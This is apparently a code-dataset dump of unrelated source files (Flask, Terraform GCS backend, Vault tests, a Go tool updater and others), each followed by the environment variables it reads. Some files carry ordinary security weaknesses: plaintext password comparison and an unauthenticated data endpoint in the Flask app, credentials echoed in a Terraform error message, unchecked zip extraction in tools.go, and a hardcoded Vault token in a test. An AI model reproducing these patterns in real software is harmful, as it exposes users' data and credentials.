response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["brl"] = brl
# initialize the database connection
db = SQLAlchemy(app)
# initialize database migration management
migrate = Migrate(app, db)
from models import Contratos, ListaCNs, Usuarios # common for db interactions
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log User in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
if not (request.form.get("email") and request.form.get("senha")):
return apology("faltou preencher algum campo", 400)
email = request.form.get("email")
senha = request.form.get("senha")
user = Usuarios.query.filter_by(email=email).first()
if user and (user.senha.strip() == senha.strip()):
session["user_id"] = user.id
flash (f"Bem vindo de volta {user.nome}")
return render_template("index.html")
else:
flash ("email ou senha incorretos")
return render_template("login.html")
else:
return render_template("login.html")
@app.route("/logout")
def logout():
session.clear()
return redirect("/")
@app.route("/")
@login_required
def index():
flash("Site em construção")
return render_template("index.html")
@app.route("/api")
def api():
contratos = Contratos.query.all()
CONTRATOS = [row2dict(contrato) for contrato in contratos]
return jsonify(CONTRATOS)
# return jsonify(json_list = [i.serialize for i in contratos])
@app.route("/tabela")
@login_required
def tabela():
contratos = Contratos.query.all()
CONTRATOS = [row2dict(contrato) for contrato in contratos]
for contrato in CONTRATOS:
contrato["valor"] = brl(float(contrato["valor"]))
return render_template("tabela.html", contratos=CONTRATOS)
@app.route("/lancar", methods=["GET", "POST"])
@login_required
def lancar():
if request.method == "POST":
id = None
contrato = request.form.get("contrato")
fornecedor = request.form.get("fornecedor")
objeto = request.form.get("objeto")
valor = request.form.get("valor")
mes = request.form.get("mes")
lancamento = Contratos(id, contrato, fornecedor, objeto, valor, mes)
db.session.add(lancamento)
db.session.commit()
return redirect("/tabela")
else:
return render_template("lancar.html")
@app.route("/lista_cns")
@login_required
def lista_cns():
contratos = ListaCNs.query.all()
CONTRATOS = [row2dict(contrato) for contrato in contratos]
# for contrato in CONTRATOS:
# contrato["valor"] = brl(float(contrato["valor"]))
return render_template("lista_cns.html", contratos=CONTRATOS)
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
|
[] |
[] |
[
"DBPASS",
"DBUSER",
"DBHOST",
"DBNAME",
"SECRET_KEY"
] |
[]
|
["DBPASS", "DBUSER", "DBHOST", "DBNAME", "SECRET_KEY"]
|
python
| 5 | 0 | |
vendor/github.com/hashicorp/terraform/backend/remote-state/gcs/backend.go
|
// Package gcs implements remote storage of state on Google Cloud Storage (GCS).
package gcs
import (
"context"
"encoding/base64"
"encoding/json"
"fmt"
"os"
"strings"
"cloud.google.com/go/storage"
"github.com/hashicorp/terraform/backend"
"github.com/hashicorp/terraform/helper/schema"
"github.com/hashicorp/terraform/httpclient"
"golang.org/x/oauth2"
"golang.org/x/oauth2/jwt"
"google.golang.org/api/option"
)
// Backend implements "backend".Backend for GCS.
// Input(), Validate() and Configure() are implemented by embedding *schema.Backend.
// State(), DeleteState() and States() are implemented explicitly.
type Backend struct {
*schema.Backend
storageClient *storage.Client
storageContext context.Context
bucketName string
prefix string
defaultStateFile string
encryptionKey []byte
}
func New() backend.Backend {
b := &Backend{}
b.Backend = &schema.Backend{
ConfigureFunc: b.configure,
Schema: map[string]*schema.Schema{
"bucket": {
Type: schema.TypeString,
Required: true,
Description: "The name of the Google Cloud Storage bucket",
},
"path": {
Type: schema.TypeString,
Optional: true,
Description: "Path of the default state file",
Deprecated: "Use the \"prefix\" option instead",
},
"prefix": {
Type: schema.TypeString,
Optional: true,
Description: "The directory where state files will be saved inside the bucket",
},
"credentials": {
Type: schema.TypeString,
Optional: true,
Description: "Google Cloud JSON Account Key",
Default: "",
},
"access_token": {
Type: schema.TypeString,
Optional: true,
DefaultFunc: schema.MultiEnvDefaultFunc([]string{
"GOOGLE_OAUTH_ACCESS_TOKEN",
}, nil),
Description: "An OAuth2 token used for GCP authentication",
},
"encryption_key": {
Type: schema.TypeString,
Optional: true,
Description: "A 32 byte base64 encoded 'customer supplied encryption key' used to encrypt all state.",
Default: "",
},
"project": {
Type: schema.TypeString,
Optional: true,
Description: "Google Cloud Project ID",
Default: "",
Removed: "Please remove this attribute. It is not used since the backend no longer creates the bucket if it does not yet exist.",
},
"region": {
Type: schema.TypeString,
Optional: true,
Description: "Region / location in which to create the bucket",
Default: "",
Removed: "Please remove this attribute. It is not used since the backend no longer creates the bucket if it does not yet exist.",
},
},
}
return b
}
func (b *Backend) configure(ctx context.Context) error {
if b.storageClient != nil {
return nil
}
// ctx is a background context with the backend config added.
// Since no context is passed to remoteClient.Get(), .Lock(), etc. but
// one is required for calling the GCP API, we're holding on to this
// context here and re-use it later.
b.storageContext = ctx
data := schema.FromContextBackendConfig(b.storageContext)
b.bucketName = data.Get("bucket").(string)
b.prefix = strings.TrimLeft(data.Get("prefix").(string), "/")
if b.prefix != "" && !strings.HasSuffix(b.prefix, "/") {
b.prefix = b.prefix + "/"
}
b.defaultStateFile = strings.TrimLeft(data.Get("path").(string), "/")
var opts []option.ClientOption
// Add credential source
var creds string
var tokenSource oauth2.TokenSource
if v, ok := data.GetOk("access_token"); ok {
tokenSource = oauth2.StaticTokenSource(&oauth2.Token{
AccessToken: v.(string),
})
} else if v, ok := data.GetOk("credentials"); ok {
creds = v.(string)
} else if v := os.Getenv("GOOGLE_BACKEND_CREDENTIALS"); v != "" {
creds = v
} else {
creds = os.Getenv("GOOGLE_CREDENTIALS")
}
if tokenSource != nil {
opts = append(opts, option.WithTokenSource(tokenSource))
} else if creds != "" {
var account accountFile
// to mirror how the provider works, we accept the file path or the contents
contents, err := backend.ReadPathOrContents(creds)
if err != nil {
return fmt.Errorf("Error loading credentials: %s", err)
}
if err := json.Unmarshal([]byte(contents), &account); err != nil {
return fmt.Errorf("Error parsing credentials '%s': %s", contents, err)
}
conf := jwt.Config{
Email: account.ClientEmail,
PrivateKey: []byte(account.PrivateKey),
Scopes: []string{storage.ScopeReadWrite},
TokenURL: "https://oauth2.googleapis.com/token",
}
opts = append(opts, option.WithHTTPClient(conf.Client(ctx)))
} else {
opts = append(opts, option.WithScopes(storage.ScopeReadWrite))
}
opts = append(opts, option.WithUserAgent(httpclient.UserAgentString()))
client, err := storage.NewClient(b.storageContext, opts...)
if err != nil {
return fmt.Errorf("storage.NewClient() failed: %v", err)
}
b.storageClient = client
key := data.Get("encryption_key").(string)
if key == "" {
key = os.Getenv("GOOGLE_ENCRYPTION_KEY")
}
if key != "" {
kc, err := backend.ReadPathOrContents(key)
if err != nil {
return fmt.Errorf("Error loading encryption key: %s", err)
}
// The GCS client expects a customer supplied encryption key to be
// passed in as a 32 byte long byte slice. The byte slice is base64
// encoded before being passed to the API. We take a base64 encoded key
// to remain consistent with the GCS docs.
// https://cloud.google.com/storage/docs/encryption#customer-supplied
// https://github.com/GoogleCloudPlatform/google-cloud-go/blob/def681/storage/storage.go#L1181
k, err := base64.StdEncoding.DecodeString(kc)
if err != nil {
return fmt.Errorf("Error decoding encryption key: %s", err)
}
b.encryptionKey = k
}
return nil
}
// accountFile represents the structure of the account file JSON file.
type accountFile struct {
PrivateKeyId string `json:"private_key_id"`
PrivateKey string `json:"private_key"`
ClientEmail string `json:"client_email"`
ClientId string `json:"client_id"`
}
|
[
"\"GOOGLE_BACKEND_CREDENTIALS\"",
"\"GOOGLE_CREDENTIALS\"",
"\"GOOGLE_ENCRYPTION_KEY\""
] |
[] |
[
"GOOGLE_ENCRYPTION_KEY",
"GOOGLE_CREDENTIALS",
"GOOGLE_BACKEND_CREDENTIALS"
] |
[]
|
["GOOGLE_ENCRYPTION_KEY", "GOOGLE_CREDENTIALS", "GOOGLE_BACKEND_CREDENTIALS"]
|
go
| 3 | 0 | |
tools/train_tc_defect.py
|
import argparse
import copy
import os
import os.path as osp
import time
import warnings
import sys
project_dir = '/projects/open_sources/object_detection/mmdetection'
sys.path.append(project_dir)
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmcv.utils import get_git_hash
from mmdet import __version__
from mmdet.apis import set_random_seed, train_detector
from mmdet.datasets import build_dataset
from mmdet.models import build_detector
from mmdet.utils import collect_env, get_root_logger
import pdb
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
parser.add_argument('--config',
default=os.path.join(project_dir, 'configs/fabric_defect/cascade_rcnn_r50_fpn_70e_fabric.py'),
help='train config file path')
parser.add_argument('--work-dir', default='/data/models/mmdetection/defect', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int, default=1,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=999, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file (deprecate), '
'change to --cfg-options instead.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.cfg_options:
raise ValueError(
'--options and --cfg-options cannot be both '
'specified, --options is deprecated in favor of --cfg-options')
if args.options:
warnings.warn('--options is deprecated in favor of --cfg-options')
args.cfg_options = args.options
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > segment in file > filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# re-set gpu_ids with distributed training mode
_, world_size = get_dist_info()
cfg.gpu_ids = range(world_size)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([(f'{k}: {v}') for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
meta['config'] = cfg.pretty_text
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, '
f'deterministic: {args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
# pdb.set_trace()
model = build_detector(
cfg.model,
train_cfg=cfg.get('train_cfg'),
test_cfg=cfg.get('test_cfg'))
# pdb.set_trace()
datasets = [build_dataset(cfg.data.train)]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmdet version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmdet_version=__version__ + get_git_hash()[:7],
CLASSES=datasets[0].CLASSES)
# add an attribute for visualization convenience
model.CLASSES = datasets[0].CLASSES
train_detector(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"LOCAL_RANK"
] |
[]
|
["LOCAL_RANK"]
|
python
| 1 | 0 | |
app/app/wsgi.py
|
"""
WSGI config for app project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'app.settings.base')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
providers/twitch/twitch_test.go
|
package twitch
import (
"os"
"testing"
"github.com/floatingghost/goth"
"github.com/stretchr/testify/assert"
)
func provider() *Provider {
return New(os.Getenv("TWITCH_KEY"),
os.Getenv("TWITCH_SECRET"), "/foo", "user")
}
func Test_New(t *testing.T) {
t.Parallel()
a := assert.New(t)
p := provider()
a.Equal(p.ClientKey, os.Getenv("TWITCH_KEY"))
a.Equal(p.Secret, os.Getenv("TWITCH_SECRET"))
a.Equal(p.CallbackURL, "/foo")
}
func Test_ImplementsProvider(t *testing.T) {
t.Parallel()
a := assert.New(t)
a.Implements((*goth.Provider)(nil), provider())
}
func Test_BeginAuth(t *testing.T) {
t.Parallel()
a := assert.New(t)
p := provider()
session, err := p.BeginAuth("test_state")
s := session.(*Session)
a.NoError(err)
a.Contains(s.AuthURL, "id.twitch.tv/oauth2/authorize")
}
func Test_SessionFromJSON(t *testing.T) {
t.Parallel()
a := assert.New(t)
p := provider()
session, err := p.UnmarshalSession(`{"AuthURL":"https://id.twitch.tv/oauth2/authorize", "AccessToken":"1234567890"}`)
a.NoError(err)
s := session.(*Session)
a.Equal(s.AuthURL, "https://id.twitch.tv/oauth2/authorize")
a.Equal(s.AccessToken, "1234567890")
}
|
[
"\"TWITCH_KEY\"",
"\"TWITCH_SECRET\"",
"\"TWITCH_KEY\"",
"\"TWITCH_SECRET\""
] |
[] |
[
"TWITCH_SECRET",
"TWITCH_KEY"
] |
[]
|
["TWITCH_SECRET", "TWITCH_KEY"]
|
go
| 2 | 0 | |
tests/common_testing.py
|
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import os
import unittest
from pathlib import Path
from typing import Callable, Optional, Union
import numpy as np
import torch
from PIL import Image
def get_tests_dir() -> Path:
"""
Returns Path for the directory containing this file.
"""
return Path(__file__).resolve().parent
def get_pytorch3d_dir() -> Path:
"""
Returns Path for the root PyTorch3D directory.
Facebook internal systems need a special case here.
"""
if os.environ.get("INSIDE_RE_WORKER") is not None:
return Path(__file__).resolve().parent
else:
return Path(__file__).resolve().parent.parent
def load_rgb_image(filename: str, data_dir: Union[str, Path]):
filepath = data_dir / filename
with Image.open(filepath) as raw_image:
image = torch.from_numpy(np.array(raw_image) / 255.0)
image = image.to(dtype=torch.float32)
return image[..., :3]
TensorOrArray = Union[torch.Tensor, np.ndarray]
def get_random_cuda_device() -> str:
"""
Function to get a random GPU device from the
available devices. This is useful for testing
that custom cuda kernels can support inputs on
any device without having to set the device explicitly.
"""
num_devices = torch.cuda.device_count()
device_id = (
torch.randint(high=num_devices, size=(1,)).item() if num_devices > 1 else 0
)
return "cuda:%d" % device_id
class TestCaseMixin(unittest.TestCase):
def assertSeparate(self, tensor1, tensor2) -> None:
"""
Verify that tensor1 and tensor2 have their data in distinct locations.
"""
self.assertNotEqual(tensor1.storage().data_ptr(), tensor2.storage().data_ptr())
def assertNotSeparate(self, tensor1, tensor2) -> None:
"""
Verify that tensor1 and tensor2 have their data in the same locations.
"""
self.assertEqual(tensor1.storage().data_ptr(), tensor2.storage().data_ptr())
def assertAllSeparate(self, tensor_list) -> None:
"""
Verify that all tensors in tensor_list have their data in
distinct locations.
"""
ptrs = [i.storage().data_ptr() for i in tensor_list]
self.assertCountEqual(ptrs, set(ptrs))
def assertNormsClose(
self,
input: TensorOrArray,
other: TensorOrArray,
norm_fn: Callable[[TensorOrArray], TensorOrArray],
*,
rtol: float = 1e-05,
atol: float = 1e-08,
equal_nan: bool = False,
msg: Optional[str] = None,
) -> None:
"""
Verifies that two tensors or arrays have the same shape and are close
given absolute and relative tolerance; raises AssertionError otherwise.
A custom norm function is computed before comparison. If no such pre-
processing needed, pass `torch.abs` or, equivalently, call `assertClose`.
Args:
input, other: two tensors or two arrays.
norm_fn: The function evaluates
`all(norm_fn(input - other) <= atol + rtol * norm_fn(other))`.
norm_fn is a tensor -> tensor function; the output has:
* all entries non-negative,
* shape defined by the input shape only.
rtol, atol, equal_nan: as for torch.allclose.
msg: message in case the assertion is violated.
Note:
Optional arguments here are all keyword-only, to avoid confusion
with msg arguments on other assert functions.
"""
self.assertEqual(np.shape(input), np.shape(other))
diff = norm_fn(input - other)
other_ = norm_fn(other)
# We want to generalise allclose(input, output), which is essentially
# all(diff <= atol + rtol * other)
# but with a sophisticated handling non-finite values.
# We work that around by calling allclose() with the following arguments:
# allclose(diff + other_, other_). This computes what we want because
# all(|diff + other_ - other_| <= atol + rtol * |other_|) ==
# all(|norm_fn(input - other)| <= atol + rtol * |norm_fn(other)|) ==
# all(norm_fn(input - other) <= atol + rtol * norm_fn(other)).
self.assertClose(
diff + other_, other_, rtol=rtol, atol=atol, equal_nan=equal_nan
)
def assertClose(
self,
input: TensorOrArray,
other: TensorOrArray,
*,
rtol: float = 1e-05,
atol: float = 1e-08,
equal_nan: bool = False,
msg: Optional[str] = None,
) -> None:
"""
Verifies that two tensors or arrays have the same shape and are close
given absolute and relative tolerance, i.e. checks
`all(|input - other| <= atol + rtol * |other|)`;
raises AssertionError otherwise.
Args:
input, other: two tensors or two arrays.
rtol, atol, equal_nan: as for torch.allclose.
msg: message in case the assertion is violated.
Note:
Optional arguments here are all keyword-only, to avoid confusion
with msg arguments on other assert functions.
"""
self.assertEqual(np.shape(input), np.shape(other))
backend = torch if torch.is_tensor(input) else np
close = backend.allclose(
input, other, rtol=rtol, atol=atol, equal_nan=equal_nan
)
if not close and msg is None:
diff = backend.abs(input - other) + 0.0
ratio = diff / backend.abs(other)
try_relative = (diff <= atol) | (backend.isfinite(ratio) & (ratio > 0))
if try_relative.all():
if backend == np:
# Avoid a weirdness with zero dimensional arrays.
ratio = np.array(ratio)
ratio[diff <= atol] = 0
extra = f" Max relative diff {ratio.max()}"
else:
extra = ""
shape = tuple(input.shape)
max_diff = diff.max()
self.fail(f"Not close. Max diff {max_diff}.{extra} Shape {shape}.")
self.assertTrue(close, msg)
|
[] |
[] |
[
"INSIDE_RE_WORKER"
] |
[]
|
["INSIDE_RE_WORKER"]
|
python
| 1 | 0 | |
config/source/vault/vault_test.go
|
package vault
import (
"encoding/json"
"fmt"
"os"
"reflect"
"strings"
"testing"
"github.com/asim/nitro/v3/config"
"github.com/asim/nitro/v3/config/memory"
)
func TestVaultMakeMap(t *testing.T) {
tt := []struct {
name string
expected []byte
input []byte
secretName string
}{
{
name: "simple valid data 1",
secretName: "my/secret",
input: []byte(`{"data":{"bar":"bazz", "tar":"par"}, "metadata":{"version":1, "destroyed": false}}`),
expected: []byte(`{"my":{"secret":{"bar":"bazz", "tar":"par"}}}`),
},
{
name: "simple valid data 2",
secretName: "my/secret",
input: []byte(`{"bar":"bazz", "tar":"par"}`),
expected: []byte(`{"my":{"secret":{"bar":"bazz", "tar":"par"}}}`),
},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
var input map[string]interface{}
var expected map[string]interface{}
_ = json.Unmarshal(tc.input, &input)
_ = json.Unmarshal(tc.expected, &expected)
out, _ := makeMap(input, tc.secretName)
if eq := reflect.DeepEqual(out, expected); !eq {
fmt.Println(eq)
t.Fatalf("expected %v and got %v", expected, out)
}
})
}
}
func TestVault_Read(t *testing.T) {
if tr := os.Getenv("CI"); len(tr) > 0 {
t.Skip()
}
var (
address = "http://127.0.0.1"
resource = "secret/data/db/auth"
token = "s.Q4Zi0CSowXZl7sh0z96ijcT4"
)
data := []byte(`{"secret":{"data":{"db":{"auth":{"host":"128.23.33.21","password":"mypassword","port":"3306","user":"myuser"}}}}}`)
tt := []struct {
name string
addr string
resource string
token string
}{
{name: "read data basic", addr: address, resource: resource, token: token},
{name: "read data without token", addr: address, resource: resource, token: ""},
{name: "read data full address format", addr: "http://127.0.0.1:8200", resource: resource, token: token},
{name: "read data wrong resource path", addr: address, resource: "secrets/data/db/auth", token: token},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
source := NewSource(
WithAddress(tc.addr),
WithResourcePath(tc.resource),
WithToken(tc.token),
)
r, err := source.Read()
if err != nil {
if tc.token == "" {
return
} else if strings.Compare(err.Error(), "source not found: secrets/data/db/auth") == 0 {
return
}
t.Errorf("%s: not able to read the config values because: %v", tc.name, err)
return
}
if string(r.Data) != string(data) {
t.Logf("data expected: %v", string(data))
t.Logf("data got from configmap: %v", string(r.Data))
t.Errorf("data from configmap does not match.")
}
})
}
}
func TestVault_String(t *testing.T) {
source := NewSource()
if source.String() != "vault" {
t.Errorf("expecting to get %v and instead got %v", "vault", source)
}
}
func TestVaultNewSource(t *testing.T) {
if tr := os.Getenv("CI"); len(tr) > 0 {
t.Skip()
}
conf, err := memory.NewConfig(config.WithSource(
NewSource(
WithAddress("http://127.0.0.1"),
WithResourcePath("secret/data/db/auth"),
WithToken("s.Q4Zi0CSowXZl7sh0z96ijcT4"),
),
))
if err != nil {
t.Fatal(err)
}
v, err := conf.Load("secret", "data", "db", "auth", "user")
if err != nil {
t.Fatal(err)
}
user := v.String("user")
if user != "myuser" {
t.Errorf("expected %v and got %v", "myuser", user)
}
v, err = conf.Load("secret", "data", "db", "auth", "host")
if err != nil {
t.Fatal(err)
}
addr := v.String("host")
if addr != "128.23.33.21" {
t.Errorf("expected %v and got %v", "128.23.33.21", addr)
}
}
|
[
"\"CI\"",
"\"CI\""
] |
[] |
[
"CI"
] |
[]
|
["CI"]
|
go
| 1 | 0 | |
pkg/components/state/state_config.go
|
/*
Copyright 2021 The Dapr Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package state
import (
"fmt"
"os"
"strings"
"github.com/pkg/errors"
)
const (
strategyKey = "keyPrefix"
strategyNamespace = "namespace"
strategyAppid = "appid"
strategyStoreName = "name"
strategyNone = "none"
strategyDefault = strategyAppid
daprSeparator = "||"
)
var (
statesConfiguration = map[string]*StoreConfiguration{}
namespace = os.Getenv("NAMESPACE")
)
type StoreConfiguration struct {
keyPrefixStrategy string
}
func SaveStateConfiguration(storeName string, metadata map[string]string) error {
strategy := metadata[strategyKey]
strategy = strings.ToLower(strategy)
if strategy == "" {
strategy = strategyDefault
} else {
err := checkKeyIllegal(metadata[strategyKey])
if err != nil {
return err
}
}
statesConfiguration[storeName] = &StoreConfiguration{keyPrefixStrategy: strategy}
return nil
}
func GetModifiedStateKey(key, storeName, appID string) (string, error) {
if err := checkKeyIllegal(key); err != nil {
return "", err
}
stateConfiguration := getStateConfiguration(storeName)
switch stateConfiguration.keyPrefixStrategy {
case strategyNone:
return key, nil
case strategyStoreName:
return fmt.Sprintf("%s%s%s", storeName, daprSeparator, key), nil
case strategyAppid:
if appID == "" {
return key, nil
}
return fmt.Sprintf("%s%s%s", appID, daprSeparator, key), nil
case strategyNamespace:
if appID == "" {
return key, nil
}
if namespace == "" {
// if namespace is empty, fallback to app id strategy
return fmt.Sprintf("%s%s%s", appID, daprSeparator, key), nil
}
return fmt.Sprintf("%s.%s%s%s", namespace, appID, daprSeparator, key), nil
default:
return fmt.Sprintf("%s%s%s", stateConfiguration.keyPrefixStrategy, daprSeparator, key), nil
}
}
func GetOriginalStateKey(modifiedStateKey string) string {
splits := strings.Split(modifiedStateKey, daprSeparator)
if len(splits) <= 1 {
return modifiedStateKey
}
return splits[1]
}
func getStateConfiguration(storeName string) *StoreConfiguration {
c := statesConfiguration[storeName]
if c == nil {
c = &StoreConfiguration{keyPrefixStrategy: strategyDefault}
statesConfiguration[storeName] = c
}
return c
}
func checkKeyIllegal(key string) error {
if strings.Contains(key, daprSeparator) {
return errors.Errorf("input key/keyPrefix '%s' can't contain '%s'", key, daprSeparator)
}
return nil
}
|
[
"\"NAMESPACE\""
] |
[] |
[
"NAMESPACE"
] |
[]
|
["NAMESPACE"]
|
go
| 1 | 0 | |
tools.go
|
package main
import (
"archive/zip"
"bytes"
"fmt"
"github.com/spf13/viper"
"io"
"io/ioutil"
"log"
"net/http"
"os"
"path"
"path/filepath"
"strings"
)
type Config struct {
Default struct {
Name string `mapstructure:"name"`
Command string `mapstructure:"command"`
Category string `mapstructure:"category"`
Comment string `mapstructure:"comment"`
Status string `mapstructure:"status"`
}
}
func filenameWithoutExtension(fn string) string {
return strings.TrimSuffix(fn, path.Ext(fn))
}
func getAppDirectory() string {
if len(os.Getenv("DOIG_PATH")) > 0 {
return os.Getenv("DOIG_PATH")
} else {
home, err := os.UserHomeDir()
if err != nil {
log.Fatal(err)
}
return home + "/." + APP_NAME
}
}
func loadTools(toolsDb map[string]*Config, directory string) {
myviper := viper.New()
myviper.AddConfigPath(directory)
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
if filepath.Ext(path) == ".ini" {
myviper.SetConfigName(filenameWithoutExtension(info.Name()))
err = myviper.ReadInConfig()
if err != nil {
log.Fatal(fmt.Errorf("Fatal error config file: %s \n", err))
}
cfg := new(Config)
err = myviper.Unmarshal(cfg)
if err != nil {
log.Fatal(fmt.Errorf("Fatal error unmarshaling config file: %s \n", err))
}
if (cfg.Default.Status != "disabled") {
toolsDb[myviper.GetString("default.name")] = cfg
}
}
return nil
})
if err != nil {
log.Fatal(Red(err))
}
}
func DownloadFile(url string) ([]byte, error) {
resp, err := http.Get(url)
if err != nil {
return nil, err
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return nil, err
}
return body, nil
}
func Unzip(zipFile []byte, dir string) error {
r, err := zip.NewReader(bytes.NewReader(zipFile), int64(len(zipFile)))
if err != nil {
return err
}
for _, zf := range r.File {
if zf.FileInfo().IsDir() {
err := os.MkdirAll(filepath.Join(dir, zf.Name), os.ModePerm)
if err != nil {
fmt.Println(Red("[X] Error creating " + filepath.Join(dir, zf.Name)))
return err
}
continue
}
dst, err := os.Create(dir + "/" + zf.Name)
if err != nil {
fmt.Println(Red("[X] Error creating " + dir + "/" + zf.Name))
return err
}
defer dst.Close()
src, err := zf.Open()
if err != nil {
return err
}
defer src.Close()
_, err = io.Copy(dst, src)
if err != nil {
return nil
}
}
return nil
}
func UpdateTools(dir string) error {
fmt.Println(Green("[*] Updating tools ..."))
zipFile, err := DownloadFile(TOOLS_URL)
if err != nil {
fmt.Println(Red("[X] Error downloading tools ..."))
return err
}
err = Unzip(zipFile, dir)
if err != nil {
fmt.Println(Red("[X] Error unzipping tools ..."))
return err
}
return nil
}
|
[
"\"DOIG_PATH\"",
"\"DOIG_PATH\""
] |
[] |
[
"DOIG_PATH"
] |
[]
|
["DOIG_PATH"]
|
go
| 1 | 0 | |
internal/bot/bot.go
|
package bot
import (
"net/http"
"os"
"github.com/sirupsen/logrus"
"github.com/jexia/discord-bot/internal/pkg/commands"
"github.com/jexia/discord-bot/internal/pkg/discord"
"github.com/jexia/discord-bot/internal/pkg/github"
)
// Start initiates the HTTP server for webhooks and requests the bot to start
func Start() {
// Tell the world we're running
logrus.Info("Bot started")
// Starts separate process that listen for events on the queue
go github.StartWatching()
go discord.StartBot()
// Load in commands and start the subscriber
go commands.StartSubscriber()
// Add the endpoint for github webhook payloads
http.HandleFunc("/github", github.WebhookListener)
// Start the HTTP server ()
address := os.Getenv("address")
logrus.Fatal(http.ListenAndServe(address, nil))
}
|
[
"\"address\""
] |
[] |
[
"address"
] |
[]
|
["address"]
|
go
| 1 | 0 | |
pkg/cmd/pr/pr.go
|
package pr
import (
"fmt"
"github.com/jenkins-x/jx-gitops/pkg/cmd/git/setup"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient"
"github.com/jenkins-x/jx-helpers/v3/pkg/helmer"
"github.com/jenkins-x/jx-helpers/v3/pkg/scmhelpers"
"github.com/jenkins-x/jx-helpers/v3/pkg/stringhelpers"
"github.com/shurcooL/githubv4"
"io/ioutil"
"os"
"path/filepath"
"strings"
"github.com/jenkins-x-plugins/jx-updatebot/pkg/apis/updatebot/v1alpha1"
"github.com/jenkins-x-plugins/jx-updatebot/pkg/rootcmd"
"github.com/jenkins-x/go-scm/scm"
